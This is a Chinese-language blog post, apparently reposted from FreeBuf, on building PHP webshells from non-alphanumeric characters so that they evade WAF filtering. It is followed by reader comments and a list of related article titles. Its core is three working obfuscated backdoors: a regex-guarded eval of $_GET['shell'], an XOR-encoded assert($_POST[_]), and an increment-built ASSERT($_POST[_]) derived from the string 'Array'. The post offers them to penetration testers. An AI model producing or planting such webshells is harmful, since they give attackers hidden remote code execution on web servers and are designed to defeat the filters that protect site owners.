通过非数字和字符的方式实现PHP WebShell
来源:互联网 发布:数据恢复哪个软件好用 编辑:程序博客网 时间:2024/06/06 03:56
话不多说,我们直奔主题!
一般来说,我们所写的webshell通常都会包含数字或字母。比如说下面这样:
<?phpif(!preg_match('/[a-z0-9]/is',$_GET['shell'])){eval($_GET['shell']);}
但如果你想要绕过WAF的话,你还得使用一些其他的技术来重写你的webshell。
思路
首先我们要明确思路,我的核心思想就是通过一系列字符变换最终利用非字母和非数字字符构建出webshell,然后使用PHP的动态函数(例如“assert”)来完成函数名的拼接,最后动态执行构建出来的代码。
所以,转换方法就是解决这一问题的重点了。但是在开始之前,我需要跟大家讨论以下php5和php7之间的区别。
php5的断言(assert)是通过函数实现的,我们可以使用$f=’assert’;$f(…);这种方法来动态执行任意代码。但是在php7中,断言已经不再是一个函数了,而是一种语言结构(类似eval),而且断言(assert)也无法再作为函数名来实现代码的动态执行了,所以对于php7来说,问题可能会变得更加复杂了。不过各位也不用太过担心,因为我们可以使用 file_put_contents函数来达到我们的目的。
为了方便起见,本文的实验环境使用的是php5,关于php7的利用方式就请各位自行去探索啦:D
方法一
这是一种最简单的方法了。在php中,我们可以通过异或运算(XOR)来得到一个或两个字符串。因此,如果我们想要得到一个a-z之间的英文字符,我们就可以通过两个非字母字符和字符数来生成所需要的字母字符。示例代码如下:
<?php$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); //$_='assert';$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');// $__='_POST';$___=$$__;$_($___[_]); // assert($_POST[_]);
解析结果如下:
方法二
在这种方法中,我们可以使用一些特殊的小技巧来实现我们的目标。首先,请大家参考php.net的这份文档:【传送门】
文档中写到:“在处理字符变量的算术运算时,PHP遵循的是Perl的规范,而并非C语言规范。比如说在PHP和Perl中,$a = ‘Z’; $a++;经过计算之后变量$a会变成 ‘AA’,但是在C语言中,a = ‘Z’; a++;计算后会将a变为‘[’(‘Z’的ASCII值为90,‘[’的ASCII值为91)。请注意,字符变量可以进行自增运算但无法进行自减运算,而且只有ASCII字母和数字(a-z,A-Z,0-9)才支持这种运算,如果对其他字符变量进行这种运算将不会有任何作用,此时的原始字符串将保持不变。”
那么接下来,我们应该如何才能得到一个包含字符‘a’的变量呢?
字符串“Array”的首字母是一个大写的‘A’,而第四个字母则是一个小写的‘a’。换句话说,我们可以通过这个字符串同时得到大写和小写的字母‘a’(A),这也就意味着我们可以通过这种方法得到a-z和A-Z中任意一个字母字符。
比如说在PHP中,如果你想拼接数组和字符串,那么你首先要将字符串(array)转换成一个字符串(这个字符串的值为Array):
然后截取字符串的首字母,我们就得到了‘A’。
利用这项技术,我编写了如下所示的webshell(由于PHP函数是对大小写敏感的,所以我在结尾补上了ASSERT($_POST[_])):
<?php$_=[];$_=@"$_"; // $_='Array';$_=$_['!'=='@']; // $_=$_[0];$___=$_; // A$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__; // S$___.=$__; // S$__=$_;$__++;$__++;$__++;$__++; // E$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// R$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// T$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// P$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// O$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// S$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// T $____.=$__;$_=$$____;$___($_[_]); // ASSERT($_POST[_]);
解析结果如下图所示:
总结
很多网站现在都会对特殊字符进行过滤和检测,因此希望这项技术可以给各位Web渗透测试人员提供一些解决问题的思路。
* 参考来源:securityonline,leavesongs , FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
- 上一篇:什么是SSL预证书?
- 下一篇: 使用Python检测并绕过Web应用程序防火墙
已有 13 条评论
- 蛤 2017-07-01回复2楼
你知道翻译有多辛苦嘛?你们就喷
亮了(5) - 17A4DF6ECED97EBC 2017-07-01回复4楼
被你猜中了 被翻译回来啦。
亮了(1) - 幕刃 2017-07-01回复6楼
为什么我第一种方法有点问题
亮了(1) - 水泡泡 2017-07-02回复7楼
p神心中毫无波动。。
- 通过非数字和字符的方式实现PHP WebShell
- 提取字符串的数字和非数字字符
- 通过get方式解析非西欧字符。
- 通过get方式解析非西欧字符。
- php webshell的防范
- 19. 将s所指字符串中的所有数字字符移到所有非数字字符之后,并保持数字字符和非数字字符串原有的先后次序。
- 非数字字符部分和数字字符部分分隔
- 多级菜单的横向导航通过非递归方式实现
- 大一下期末考试:将数字字符和非数字字符组成的字符串中的数字提取出来
- JS 屏蔽非数字字符的输入
- 输入一个字符串,内有数字和非数字字符,
- 输入一个字符串,内有数字和非数字字符。
- 免杀的php webshell
- 如何实现oracle字段中字符+数字的数据------兼顾字符和数字组合排序
- 字符设备的信号量,阻塞和非阻塞,poll实现
- 编写程序从键盘上输入一些字母和数字,统计显示其中的数字字符的个数和非数字字符个数。
- php 通过网页的方式备份和还原mysql数据库
- php 通过网页的方式备份和还原mysql数据库
- 浅谈PID
- VCL组件之Button
- Git & Gitlab 使用指南
- OsmocomBB 代码分析(2)
- Android音视频API(android.media):概览
- 通过非数字和字符的方式实现PHP WebShell
- sublime 安装插件
- echart学习
- windows配置Opencv——vs2013+opencv2.4.10
- 如何快速转载CSDN中的博客
- MFC代码块执行时间
- Linux入门学习(一)
- 搭建Nginx图片服务器
- Python运算符
这些评论亮了